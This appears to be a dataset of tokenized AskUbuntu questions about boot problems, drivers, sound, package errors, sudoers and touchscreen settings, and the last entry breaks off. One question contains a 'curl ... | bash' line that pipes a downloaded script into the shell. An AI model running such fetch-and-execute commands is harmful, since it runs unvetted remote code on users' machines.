246392	ubuntu 12.04 wo n't boot in windows boot loader , flashes purple screen and returns to windows boot loader	my version of ubuntu 12.04 was working fine until i instlalled some updates . after this windows 7 would not load . i changes some settings to get the windows boot loader to work but now ubuntu will not get to the log in screen . when selected in the boot manager , it flashes a purple screen for barely a second and returns to the boot manager . happens every time . bit of a beginner in this so not too sure what to do .
246397	will ubuntu for phone run well on a samsung galaxy tab2 with 3g ?	i want to buy a tablet , however i want a tablet that i can also use for phone calls ( without voip services ) . so i 'm asking if a samsung tab2 will run it well and with all the functions of a normal cellphone from ubuntu ?
246404	dual-booting my system with windows 7 and ubuntu and booting the same windows os into a vm while running ubuntu ?	0 down vote favorite 1 so essentially i would like to be able to physically boot from either w7 or linux on start-up , but i would rather remove the hassle of having to shut down everything i 'm doing in linux and wait for windows to boot up in order to use windows-only applications . i googled the topic extensively ( i think ... ) and could n't really find an informative and knowledgeable answer ... i would very much appreciate anyone 's input on this . someone on a forum mentioned something about the registry and drivers having issues as the vm runs on abstracted hardware , but i 'm not sure if there are ways to get around or patch that . before anyone asks , the reason i wish to do this is so that i could primarily use linux and just run a windows 7 vm seamlessly over it , but i also want to be able to boot directly into the windows partition for more hardware-intensive applications like gaming and graphic design . i really appreciate anyone 's advice on the matter !
246406	ubuntu is there any frame by frame video editor software which can allow to place a picture ?	i have this video : http : //www.youtube.com/watch ? v=f8ioq9zwp6a where i have to place two picture of my girl-friend , i have to replace the existing baby faces by those two pictures , which i will make a special dvd for one surprise / gift to my girl-friend . to make her smile . but so far i have tried openshot but i can not edit frame by frame there . then i tried gimp with gimp-gap plugin , but still using gimp is like i can spend 1 year to make this video . is there any frame by frame editing software available for ubuntu ? ( for example , in flash for windows its easy to do such thing ) any idea ?
246407	no sound using ubuntu 12.10 on toshiba satellite p100	i 'm using ubuntu 12.10 , and i 'm not getting any sound from my toshiba satellite p100 's internal speakers . i have an intel nm10/ich7 family high definition audio controller , and it 's recognized by the system when i type lspci -v | grep -a7 -i `` audio '' into the cli . my sound card is also listed in the ubuntu sound card matrix , so it should be supported . i have master volume and speaker volume both turned up , as well as the volume knob on the front of my laptop , but still i get no sound . any thoughts ? i 'm new to linux os and ubuntu .
246408	ubuntu unity 12.10 really slow	unity dash is really slow and unresponsive , it takes between 5 and 20 seconds just to load . i 'm running a laptop with 2gb ram , amd turion ( tm ) 64 x2 mobile technology tl-64 ă 2 , gallium 0.4 on ati rs690 graphics . the original install is ubuntu studio , which i have added ubuntu desktop to . as a test i did a clean install of ubuntu studio , then ran updates and added ubuntu desktop + unity , this had no effect . the output of /usr/lib/nux/unity_support_test -p is : opengl vendor string : x.org r300 project opengl renderer string : gallium 0.4 on ati rs690 opengl version string : 2.1 mesa 9.0 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes sudo lshw -c video gives the output : *-display description : vga compatible controller product : rs690m [ radeon x1200 series ] vendor : advanced micro devices [ amd ] nee ati physical id : 5 bus info : pci @ 0000:01:05.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=64 resources : irq:43 memory : f0000000-f7ffffff memory : f8100000-f810ffff ioport:9000 ( size=256 ) memory : f8000000-f80fffff edit : i used system monitor to check cpu and memory usage , despite unity very slow and unresponsive cpu usage never went above 50 % neither did memory use . i 'm pretty sure it 's something linked with unity dash as once programs are open they run relatively fast . there is no more lag than i would expect browsing the web or typing this . the problem is when i press super key or alt and try to type , i could have a nap before it displays what i 've typed . also the side bar is unusable , it takes forever to appear if at all and disappears to quickly for me to click on anything . sudo hdparm -v /dev/sda gives : /dev/sda : multcount = 0 ( off ) io_support = 1 ( 32-bit ) readonly = 0 ( off ) readahead = 256 ( on ) geometry = 24321/255/63 , sectors = 390721968 , start = 0 sudo hdparm -tt /dev/sda gives : timing cached reads : 1344 mb in 2.00 seconds = 672.19 mb/sec timing buffered disk reads : 136 mb in 3.01 seconds = 45.15 mb/sec
246409	dual booting in csm mode	csm boot mode does not detect windows 8 as being installed but it 's the only way i can boot any version of linux . will windows 7 install in csm so i can install ubuntu for dual boot purposes ?
246410	ubuntu 11.10 unable to locate package	i try type in command line sudo apt-get install likewise-open to join a domain , but i get an output sound like this : unable to locate package likewise-open any help please..
246411	new video card stops at ubuntu startup screen	i have removed an older nvidia card and put a ami hd4550-based card into a ubuntu machine running 11.10 . i ran the nvidia uninstall script and then have followed that by using the steps in is my ati graphics card supported in ubuntu ? to install the fglrx packages . namely : sudo apt-get install build-essential cdbs fakeroot dh-make debhelper debconf libstdc++6 dkms libqtgui4 wget execstack libelfg0 dh-modaliases then : sudo apt-get install fglrx fglrx-amdcccle however , when i now restart the system , after the bios screen , the 'unbuntu ' screen with the red dots appears ... and goes no further . it simply hangs there although the system can be ssh'ed to . i 'm not fussy and just want the card to run the console so any drivers will work - open source or not .
246412	any way to check dvd before i install ?	i am running the live 12.04 desktop iso . its working fine but i 've had my share of bad installs and would like to check if all the files are good before i install . how would i do this ?
246425	where are the button images for the ambiance theme ?	i would like to know where the image files for the ambiance theme 's buttons can be found . ( the buttons that are used for dialong boxes and the like ; not the window control buttons . ) i 've tried /usr/share/themes/ambiance/gtk-2.0/ , but that does n't contain a `` buttons '' folder like the normal themes do . i 've tried to puzzle out the gtkrc file , but to no avail . yes , i know you can just use a screenshot , but not for the purpose i need . ( i need the correctly antialiased transparent edges . ) if somebody could explain to me where i might find those files , i would much appreciate it .
246426	about to dual boot ubuntu with currently installed windows 7 need expert advice !	so , i 've tried this a dozen times with many a complications . i want advice on how to do this and avoid the pain . the system : dell xps l502x 64 bit 8gb of ram currently running windows 7 nvidia geforce gt 525m < -- - the culprit ! ! ! ! ! all i want to do is dual boot a nice ubuntu os and use both monitors . so my question to all of you ubuntu gangstas out there : given my set up which version of ubuntu should i use . what kernals do i avoid installing and how do i go about avoiding it . i have found the 3.7 kernal is n't ready for the big time in this regard . is this true ? what can i do to get this to work . i 'd like to run ubuntu 12.10 , but if it not a ready i 'll avoid it . basically , if you had my exact system , and wanted to run a dual booting windows 7/newest possible version of the might ubuntu , how would you do it ?
246429	ubuntu 12.04 error command not found	i have installed ubuntu 12.04 desktop lts on three intel systems . all the three pcs are using the same kernel version ( 3.2.0-29-generic-pae ) . but i have a problem that when i compile and build my executable on one pc , it does not run on the other pcs and displays an error message `` command not found '' . however , if the same code is rebuilt on the other pc , it runs successfully . how can i make my executable built on one pc to run on another pc with the same ubuntu 12.04 linux kernel ?
246430	how can i remove the second ubuntu at start up	i had to uninstall and then reinstall ubuntu . now i show two ubuntu choices in the menu when i start my computer . i searched google and have removed the extra kernel . that did not fix my problem . does anyone know how to remove the second ubuntu choice . i can type what it looks like it only has three lines : windows 7 ubuntu ubuntu i dont think it was uninstalled correctly now that you mention it . well i can not seem to add comment to any of the posts so i dont know how to answer anyone but the answers provided didnt cover getting rid of one of the ubuntu .
246434	is there a utility to show total up/download quantity of a process	in bash i can run time $ ( curl -l ... |bash ) to find out the total time this script takes . is there a way to get similar total information about the up/download traffic it generated ? note that nethogs does not do what i need - it shows the traffic rates from time to time . i 'd like the cummulative total of the traffic in/out .
246437	how to give apache2 permission to write and read files ?	when i installed wordpress in my ubuntu 12.04 i found that wordpress itself not write wp.config file . he tell me to copy this into wp.config file . look like wordpress not able to write the files . now when i tried to install the plugin then it 's not able to write the plugin so it 's tell me to ftp detail . this is my computer not server so i want to gave apache2 full permission to do any kind of operation . now somebody please help me on how i can set permission for apache . i have check but their is no group in my 12.04 installation that 's called `` apache '' . help
246442	ubuntu 12.10 has 80 degree celsius laptop temperature	my laptop seems to be wobbling between 70-85 degrees celsius . i 'm pretty sure this is n't normal , as my laptop is shutting itself off nearly every two hours . please help . inspiron 15r laptop i forgot to mention . i do not have this issue at all when i boot with windows 8 .
246448	can i install ubuntu 12.10 without installing video drivers ?	so i have an old ( got it free ) laptop that my mom gave me after she spilled coffee on it . i was able to clean it and get it running windows xp . i was only able to do this by letting it bsod and getting into safe mode and disabling the video card in the device manager . i want to install ubuntu 12.10 but i canât seem to figure out how to disable the video card like i did in windows . the install seems to go fine until the first reboot and then the background loads but no desktop icons and then i get the error messages and it asks me if my video card froze requiring a hard reboot .
246449	unable to resume from hibernation on boot- restarts instead of resuming	after fiddling around a lot with rhythmbox and banshee one day , i had to xkill them and logout a few times , and i think i remember seeing some error message asking for the keyring . i entered my password and it went away . after that , i had not realised that whenever i hibernate , the computer pretends that it has gone into hibernation and it seems perfectly okay , until the next time i start . the computer then does not resume from hibernate , it instead starts as though it had been shut down and i lose all unsaved data . steps taken : i suspected an error in swap and tried reformatting the swap partition in gparted and turned it back on , to no avail . on the subsequent boots , the swap drive is no longer being recognised , and hence now i do n't even see the hibernate option . of the possible reasons given by gparted , i think this ( `` the device entry /dev/sda7 is missing '' ) is the relevant one . how do i set it right and re-enable hibernation ? ( even the command sudo pm-hibernate does n't work now since the swap partition is n't recognised . )
246455	how to give nopasswd access to multiple commands via sudoers ?	below is what i know : i have to add this below line in sudoers file to give rights to the user for particular task . user_name all=nopasswd : /usr/bin/apt-get install in this case i want to give access to this user to restart 2 services ( i.e . apache and mysql ) with all install rights . using the above line , i have given him all install rights , now do i have to add same line two more times to give the rights for services ? or can i just add those commands in the same line , separated by comma or something ?
246463	how do i audit an executable to make sure it is not malicious ?	i was wondering if there is a tool or a technique to run an executable in an isolated environment , maybe in a virtual machine . while the program is running , i want to be able to audit the application , i.e . see everything that the executable is doing ( file and network access ) . by doing so i want to be able to check if the executable is malicious , i.e . performs operations which it should n't ( read/write to files , listen on/connect to network ports , ... ) . i would n't mind something with a graphical interface .
246466	what is the file path for the ubuntu software centre executable ?	what is the file path for the ubuntu software centre executable ? usr/bin/ maybe ? also what is the file name ?
246475	middle mouse button does n't work	after i upgraded to 12.04 lts my middle mouse button stopped working ... it worked fine before the upgrade . i can scroll with the wheel but when i push it down it refuses to work . can someone tell me how to make my mouse work again ?
246479	why does df show two root mounts on my zfs system ?	why am i seeing two roots on 'df ' but not on 'mount ' ? i 'm using zfs . root @ a : / $ df -h filesystem size used avail use % mounted on rootfs 4.0g 3.2g 801m 80 % / udev 3.8g 4.0k 3.8g 1 % /dev tmpfs 1.6g 720k 1.6g 1 % /run rpool/root/ubuntu-1 4.0g 3.2g 801m 80 % / cgroup 3.9g 0 3.9g 0 % /sys/fs/cgroup tmpfs 3.9g 4.0k 3.9g 1 % /tmp none 5.0m 0 5.0m 0 % /run/lock none 3.9g 0 3.9g 0 % /run/shm /dev/sda1 16m 5.8m 9.8m 37 % /boot/grub big 1.7t 0 1.7t 0 % /big big/home 1.7t 0 1.7t 0 % /home big/home/user1 1.8t 124g 1.7t 7 % /home/user1 rpool 801m 0 801m 0 % /rpool rpool/root 801m 0 801m 0 % /rpool/root yet 'mount ' shows this : root @ a : / $ mount sysfs on /sys type sysfs ( rw , nosuid , nodev , noexec , relatime ) proc on /proc type proc ( rw , nosuid , nodev , noexec , relatime ) udev on /dev type devtmpfs ( rw , relatime , size=3981832k , nr_inodes=995458 , mode=755 ) devpts on /dev/pts type devpts ( rw , nosuid , noexec , relatime , gid=5 , mode=620 , ptmxmode=000 ) tmpfs on /run type tmpfs ( rw , nosuid , relatime , size=1609884k , mode=755 ) rpool/root/ubuntu-1 on / type zfs ( rw , relatime , xattr ) none on /sys/fs/fuse/connections type fusectl ( rw , relatime ) cgroup on /sys/fs/cgroup type tmpfs ( rw , relatime , mode=755 ) none on /sys/kernel/debug type debugfs ( rw , relatime ) none on /sys/kernel/security type securityfs ( rw , relatime ) tmpfs on /tmp type tmpfs ( rw , noatime ) none on /run/lock type tmpfs ( rw , nosuid , nodev , noexec , relatime , size=5120k ) none on /run/shm type tmpfs ( rw , nosuid , nodev , relatime ) cgroup on /sys/fs/cgroup/cpuset type cgroup ( rw , relatime , cpuset ) cgroup on /sys/fs/cgroup/cpu type cgroup ( rw , relatime , cpu ) cgroup on /sys/fs/cgroup/cpuacct type cgroup ( rw , relatime , cpuacct ) cgroup on /sys/fs/cgroup/memory type cgroup ( rw , relatime , memory ) cgroup on /sys/fs/cgroup/devices type cgroup ( rw , relatime , devices ) cgroup on /sys/fs/cgroup/freezer type cgroup ( rw , relatime , freezer ) cgroup on /sys/fs/cgroup/blkio type cgroup ( rw , relatime , blkio ) cgroup on /sys/fs/cgroup/perf_event type cgroup ( rw , relatime , perf_event ) /dev/sda1 on /boot/grub type ext3 ( rw , relatime , errors=continue , user_xattr , acl , barrier=1 , data=ordered ) big on /big type zfs ( rw , relatime , xattr ) big/home on /home type zfs ( rw , relatime , xattr ) big/home/user1 on /home/user1 type zfs ( rw , relatime , xattr ) rpool on /rpool type zfs ( rw , relatime , xattr ) rpool/root on /rpool/root type zfs ( rw , relatime , xattr ) gvfs-fuse-daemon on /var/lib/lightdm/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , relatime , user_id=108 , group_id=115 )
246484	ca n't connect to university wireless network	i ca n't log onto my university network with ubuntu 12.04 lts . normally , to first connect ( using windows ) i have to connect to a `` setup '' network which then runs some `` express '' program using either java or java runtime environment which then configures the laptop for use on the secured wireless network . when i connect to the setup network , firefox just endlessly loads and does nothing . i also went to the it department and tried doing the same thing through an ethernet connection with similar results . lastly , the it person tried entering all the network information and connecting directly , at which point a pop up said something about the security certificate ( ? ? ) and gave the options to either ignore or to select a certificate . however , clicking either button did nothing , literally nothing ; it behaved as though no button had been clicked at all . also if it matters , i can detect and connect to other networks , it is only the university `` eduroam '' network that i have had trouble with . so can i just run firefox with wine or some emulator / vm and run the setup network through that ? would this affect the ubuntu wireless or only be effective while running the emulation ? is there some way to bypass the security certificate business ? or at least successfully answer the question such that i could connect ? does 12.04 have some kind of firewall or something i need to disable first ? please help !
246492	successful back-port of evolution 3.6.2 into 12.10 ?	any successful back port of evolution 3.6.2 into 12.10 ? i tried the steps and suggestions in how to install evolution 3.6.2 from 13.04 into 12.10 ? for 64bit installation . did not work though !
246498	apt-get upgrade fails with `permission denied`	i have recently installed 12.04 and all seemed to be well , until today when i got a series of errors when trying to run apt-get upgrade : $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : visual-regexp the following packages will be upgraded : dkms firefox firefox-globalmenu firefox-gnome-support firefox-locale-en gnome-games-data gnome-sudoku gnomine google-chrome-stable libglu1-mesa libglu1-mesa : i386 libmysqlclient18 : i386 mahjongg mysql-common tk8.5 vino 16 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 11 not fully installed or removed . need to get 0 b/67.4 mb of archives . after this operation , 2,890 kb of additional disk space will be used . do you want to continue [ y/n ] ? ( reading database ... dpkg : warning : files list file for package `tk8.5 ' missing , assuming package has no files currently installed . ( reading database ... 235237 files and directories currently installed . ) removing visual-regexp ... dpkg ( subprocess ) : unable to execute installed post-removal script ( /var/lib/dpkg/info/visual-regexp.postrm ) : permission denied dpkg : error processing visual-regexp ( -- remove ) : subprocess installed post-removal script returned error exit status 2 errors were encountered while processing : visual-regexp e : sub-process /usr/bin/dpkg returned an error code ( 1 ) it all seems to have started with this infamous error : dpkg : warning : files list file for package `tk8.5 ' missing , assuming package has no files currently installed . which was probably originated by my installing visual-regexp - which i 'm now unable to remove . i 've tried several fixes , including : sudo apt-get -f install sudo dpkg -- configure -a sudo apt-get -- fix-missing upgrade and others , trying to follow this answer , but to no avail . also , i 'm not quite clear what the problem may be with the permission , as i 'm obviously running apt-get as sudo : $ ll /var/lib/dpkg/info/visual-regexp.postrm -rwxr-xr-x 1 root root 160 jun 24 2011 /var/lib/dpkg/info/visual-regexp.postrm also , note the 11 not fully installed or removed . which was due to previous failures in apt-get upgrade : is there any way to recover from this ? thanks in advance , marco .
246499	fixed window placement - how can i switch to a specific workspace upon opening an application ?	i 've configured terminal to always open on workspace 3 using compiz - this is working fine . what i want is for terminal to open on workspace 3 and for workspace 3 to become my active workspace . for example : i 'm on workspace 1 , doing something . i suddenly want to open terminal and run some commands , ctrl+alt+t gets me a new terminal window in workspace 3 , but i 'm still in workspace 1 and i ca n't see it . now , in addition to opening the terminal window , i need to alt+tab to get to it . is there a way that i can make applications that have been set to open in a specific workspace also take me to that workspace if i 'm not there already - and have that application as the 'current ' active application ( as if i 've just alt+tab 'd to it ) ?
246500	how do i update only one specific application	i have chromium installed . i want to update it and only it . is there any way to do that ?
246503	how can i direct make-kpkg to output .deb files to a different location ?	i am compiling a new kernel on my ubuntu 12.04.1 using make-kpkg . in order to do so , i 'm doing the same process as suggested in izx 's answer . however , i want to direct the generated .deb files to my own folder instead of ../ ( which is the default ) . that way i could put the source files in /usr/src/linux-3.7.4 and not have to run the command as root just to save the files to /usr/src . what is the best way to achieve that ? thanks in advance !
246505	ubuntu hangs after checking battery state [ ok ]	having asus p5k chipset with 4gb ddr3 ram , intel core 2 duo 2.66ghz system running win 7 64bit , nvidia 9800gt , want to try ubuntu so installed ubuntu using vmware player 5 by following the link below : www.howtogeek.com/howto/11287/how-to-run-ubuntu-in-windows-7-with-vmware-player/ the os install , boots perfectly , install vmware tools and then updates using software updater on the left bar , restarts and it hangs at the checking battery state [ ok ] . some time when i redo the installation process after deleting the virtual machine , as process as abv , it goes to login screen , enter password and all i can see is a desktop background , no icons nothing ... but i can right click create folder , etc . open up terminal ... thanks , sundar .
246507	how to run code on android tablet from ubuntu connected via usb ?	i am trying to run a c code on an android tablet from my computer which has ubuntu 12.04 . but when i run the application on android the tablet is not getting detected . please help me as to what to do .
246510	force update of calculator currency rate	i have gcalctool 6.4.1.1 on ubuntu 12.04 i am using the currency conversion in financial mode . got to know from launchpad answers that the tool updates the rates from european central bank every 7 days . i would like to know if i can force update the rates .
246512	ca n't remove icon from gnome panel by alt+right click or windows+alt+right click ?	i have read some questions about how to remove icon from gnome panel , i try to hold alt and right click or windows+alt and right click but not menu display ! i use ubuntu 12.0
246515	how to set ccpd daemon to start automatically at startup ?	after installing a canon printer in quantal , in order to print i have to start ccpd at each restart with the command sudo /etc/init.d/ccpd start this should be automated , says the driver manual . but before doing that , i believe that a script for that command must be created . or is there a way to make the command run at startup without creating a script first ? whether a script must created or not , i guess a different command should be used , one that does n't open the terminal and does n't ask for the password each time . i guess the answer might be like here , editing /etc/rc.local . that file looks like this : # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . exit 0 but what should i do : just paste the command in the line 13 before exit 0 ? and what the command should be exactly ? ( a supplementary question that i should ask is maybe this : should that command be put to start with the computer or only at login , or is that unimportant ? ) considering similar questions on askubuntu , beside the fact that i am not sure what the command is : this looks promising , but the answer was not set as definitive , and i need more advice . also , i am in lubuntu and do not have the ubuntu gui that adds stuff at startup . the same for this . also this : but its answer only concerns where to put the script not how to create it , and i guess the comment there drastically amends the answer ( `` ~/.profile ( which also calls ~/.bashrc ) is only executed when logging into a shell ( through terminal or ssh for example ) . not when logging into the gui '' )
246517	not able to change brightness [ 12.04 ]	i ca n't change my brighness via the default ubuntu tool or my fn keys , or even xbacklight . i 'm running ubuntu 12.04 on a laptop with a dual graphics ( amd hd6770m+intel ) . i 've the drivers set up properly and i can switch between them . i 've tried to adjust the brightness on both the integrated and discrete gpu . nothing happens . any clue how do i go ahead fixing this ? i 've tried every solution here : unable to change brightness in a lenovo laptop
246518	dangerous website may have infected system ?	last day i finished my website and tried to check how it looks on other browsers using www.browsershots.org , but i had a mistake while writing the address and i wrote http : //browsershot.com which redirected me to http : //rudespace.com . the website which i 've been redirected to is an adult one and i really hate i did that . now i 'm really worried and i do n't know what should i do ? stay calm because everything 's fine or worry ?
246521	text gets garbled after hibernate	my 12.04 install sometimes does this to the text on the screen : this happens on all text in nautilus , all context menus , bookmarks/omnibox/statusbar on chrome , and elsewhere in other programs . i 've never had it happen to me after a clean boot , but it does sometimes happen after i boot from a hibernated os . i had recently installed gnome shell 3 ( unstable ) , but i removed it later , and this problem started then . how ought i fix this ?
246522	struggling with ubuntu server sound . can not make it output anything !	i 'm struggling with ubuntu server sound , i can not make it to work . i want it to run mocp and play music , but no luck . os : ubuntu server 12.04.1 lts cat /proc/asound/cards 0 [ intel ] : hda-intel - hda intel hda intel at 0xfea78000 irq 43 alsamixer looks like this : lspci -v 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) subsystem : asrock incorporation device 3662 flags : bus master , fast devsel , latency 0 , irq 43 memory at fea78000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel lsmod | grep snd snd_hda_codec_realtek 224173 1 snd_hda_intel 33773 3 snd_hda_codec 127706 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 17764 1 snd_hda_codec snd_pcm 97275 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61929 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd 79041 15 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc662 rev1 analog [ alc662 rev1 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0
246527	no such partition - grub rescue	i have a dual bootsytem on my laptop . windows 7 and ubuntu 12.04 . while working in windows i deleted a small and ( what i thought to be ) a very non important partition of 100mb . now when i restarted the laptop , it got stuck with the grub recue ( no such partiiton ) i know my data is still there of both my ubunutu and windows system . i have no other backup and i need to restore the boot again without removing any of the stored data . please guide me how to restore my system without having to delete any data . i have made a photo of the terminals output . please view it here flickr.com/photos/92524026 @ n05/8410188685/in/photostream hope you can help me further many thanks ...
246528	can i install ubuntu 12.10 on a external harddrive using the windows installer ?	i want to get a hard drive which then i will use it to install ubuntu 12.10 using the windows installer . is it possible to install ubuntu on an external drive then plug it out for later use and back in so that i can use ubuntu again ? i do n't want to mess up my already installed windows 8 software .
246529	ubuntu spurious environment variable	i have a spurious path in my ~path~ environment variable in ubuntu : /usr/lib/lightdm/lightdm i have no idea where it is set . i have checked these files : /etc/environment /etc/profile /etc/profile.d/* /etc/bash.bashrc ~/.bash_profile ~/.bashrc ~/.profile ~/.pam_environment any idea where else it can be or how can i find it ?
246530	how to create a script that would execute a command at double-click ?	i want to know how to create a script that i could put on the desktop and execute on double-click so as to run a command in terminal . i know how to make the script executable but do not know what text it should have . for example , my command could be /etc/init.d/ccpd status . creating an executable script like this # ! /bin/bash /etc/init.d/ccpd status does nothing , while in terminal it is like this : ~ $ /etc/init.d/ccpd status /usr/sbin/ccpd : 2568 2564 i am aware that my question looks similar to this here . but , trying to use that 10-up-voted definitive answer , it does n't give me enough information so as to do it right . what to do - according to that answer ? creating a script like this # ! /bin/bash gnome-terminal -e [ /etc/init.d/ccpd status ] gives error how to modify the script to make it work ? considering the closing as duplicate : i voted to close but now looking closer at the answers i see that this question clearly puts something that the other one just implies . i mean , one has to know the answer to this one ( how to create the simplest script ) just to understand the answers to the other . this maybe means it is not duplicate : or maybe a new answer/edit is needed in the other one in case this was closed .
246538	cant upgrade or get package manager to refresh	i used ubuntu a long time ago and was ok with it . i went away from it because i needed a windows computer to do work . now that i have a second computer i back on it but now i 'm relearning everything about it , well still have to relearn but you get the picture . when i got the computer it had a password on it and could n't access it so i was a little lazy and just threw a start up disk i made in '09 i believe it was . got everything installed and up and running , i then tried to upgrade to the latest version but a message comes up that it could n't contact the server or something like that . said that i may have a network problem . i checked my internet and everything works . i can browse no problem , also , trying to download adobe flash , it downloads and i can extract the files but that 's it , a message pops up saying that i need to updates the system for it to work . so i try again and still nothing . figuring that maybe the system was down for maintenance or something crazy i gave up for the day and now i back and still the same problems . i did the obvious of restarting and trying again but to no avail . what should i do ? like i said before it 's been a long time since i used ubuntu last so please be gentle and walk me through step by step . thank you . hoffert88
246542	dutch dictionary in evolution for ubuntu	i 'd like to know how to install a dutch dictionary in the mail program evolution for ubuntu . in preferences i can see which dictionaries ( all english ) are installed but not how to add another dictionary . best regards , and thanks in advance . arnold
246547	is it possible to change language for user interface temporarily ?	i use ubuntu 12.04 with german ui . however , when i ask questions here or anywhere else on stack exchange , and i am adding screenshots , i would prefer having them in english . thus , my question is : how can i change the language of a certain application , let 's say rhythmbox , to display in english for creating screenshots . note : i do n't want to change it permanently , and i would prefer not to change it for all applications . also , i would prefer not having to log out for finishing that task . it should be on the fly .
246553	is development of ubuntu phone on other platforms possible ?	when i first read about ubuntu phone i became very excited about it . however , i am disappointed to see that if i want to get started i should download and install ubuntu first . while i can totally understand this ( it 's pretty much the same with windows phone and ios ) , i prefer debian on desktop and i do n't want to get rid of it , although i could n't find the qml toolkit for debian , nor windows . is there any chance that developer tools will be released for the above mentioned platforms ?
246563	why did this fix for openvz ubuntu 12.04 work and how ?	i am running ubuntu 12.04 lts in an openvz container under proxmox 2.x i noticed that on reboots , postgres was not starting . some short searches revealed that i need to change a few lines in /etc/init/tty1.conf the changes required me to change the document from this : # tty1 - getty # # this service maintains a getty on tty1 from the point the system is # started until it is shut down again . start on stopped rc runlevel= [ 2345 ] and ( not-container or container container=lxc or container container=lxc-libvirt ) stop on runlevel [ ! 2345 ] respawn exec /sbin/getty -8 38400 tty1 to this : # tty1 - getty # # this service maintains a getty on tty1 from the point the system is # started until it is shut down again . start on stopped rc runlevel= [ 2345 ] stop on runlevel [ ! 2345 ] respawn exec /sbin/getty -8 38400 tty1 how could this have solved postgres starting automatically at boot time ? what exactly did the removal of those lines do ?
246564	xinput -- set-prop does not work for touchscreen	i am using the following 2 touchscreens : dell st2220t , samsung lti220mt02 . i have just installed ubuntu 12.10 because i have read that 12.10 has better touchscreen support than 12.04 . both touchsreens work , but for both touchscreens the touch inputs are interpreted for both axes in the contrary direction : when i move right with the finger , the mouse pointer moves left and the other way round . when i move up with the finger , the mouse pointer moves down and the other way round . so i have tried the following ( example with dell monitor ) : root @ wasumobile2 : /home/walter # xinput -- list ⎡virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=11 [ slave pointer ( 2 ) ] ⎜ ↳ lg display lgd-multitouch id=16 [ slave pointer ( 2 ) ] ⎣virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ... the dell touchsreen is displayed as `` lg display lgd-multitouch '' . i get details of the configuration with : root @ wasumobile2 : /home/walter # xinput -- list-props 16 device 'lg display lgd-multitouch ' : device enabled ( 132 ) : 1 coordinate transformation matrix ( 134 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 256 ) : 0 device accel constant deceleration ( 257 ) : 1.000000 device accel adaptive deceleration ( 258 ) : 1.000000 device accel velocity scaling ( 259 ) : 10.000000 device product id ( 251 ) : 8146 , 100 device node ( 252 ) : `` /dev/input/event15 '' evdev axis inversion ( 574 ) : 0 , 0 evdev axis calibration ( 575 ) : < no items > evdev axes swap ( 576 ) : 0 axis labels ( 577 ) : `` abs mt position x '' ( 558 ) , `` abs mt position y '' ( 559 ) , `` none '' ( 0 ) , `` none '' ( 0 ) button labels ( 578 ) : `` button unknown '' ( 566 ) , `` button unknown '' ( 566 ) , `` button unknown '' ( 566 ) , `` button wheel up '' ( 138 ) , `` button wheel down '' ( 139 ) evdev middle button emulation ( 579 ) : 0 evdev middle button timeout ( 580 ) : 50 evdev third button emulation ( 581 ) : 0 evdev third button emulation timeout ( 582 ) : 1000 evdev third button emulation button ( 583 ) : 3 evdev third button emulation threshold ( 584 ) : 20 evdev wheel emulation ( 585 ) : 0 evdev wheel emulation axes ( 586 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 587 ) : 10 evdev wheel emulation timeout ( 588 ) : 200 evdev wheel emulation button ( 589 ) : 4 evdev drag lock buttons ( 590 ) : 0 now i try to invert the axes : root @ wasumobile2 : /home/walter # xinput -- set-prop 16 574 1 1 i know check if the values have been saved . root @ wasumobile2 : /home/walter # xinput -- list-props 16 device 'lg display lgd-multitouch ' : device enabled ( 132 ) : 1 coordinate transformation matrix ( 134 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 256 ) : 0 device accel constant deceleration ( 257 ) : 1.000000 device accel adaptive deceleration ( 258 ) : 1.000000 device accel velocity scaling ( 259 ) : 10.000000 device product id ( 251 ) : 8146 , 100 device node ( 252 ) : `` /dev/input/event15 '' evdev axis inversion ( 574 ) : 1 , 1 evdev axis calibration ( 575 ) : < no items > evdev axes swap ( 576 ) : 0 axis labels ( 577 ) : `` abs mt position x '' ( 558 ) , `` abs mt position y '' ( 559 ) , `` none '' ( 0 ) , `` none '' ( 0 ) button labels ( 578 ) : `` button unknown '' ( 566 ) , `` button unknown '' ( 566 ) , `` button unknown '' ( 566 ) , `` button wheel up '' ( 138 ) , `` button wheel down '' ( 139 ) evdev middle button emulation ( 579 ) : 0 evdev middle button timeout ( 580 ) : 50 evdev third button emulation ( 581 ) : 0 evdev third button emulation timeout ( 582 ) : 1000 evdev third button emulation button ( 583 ) : 3 evdev 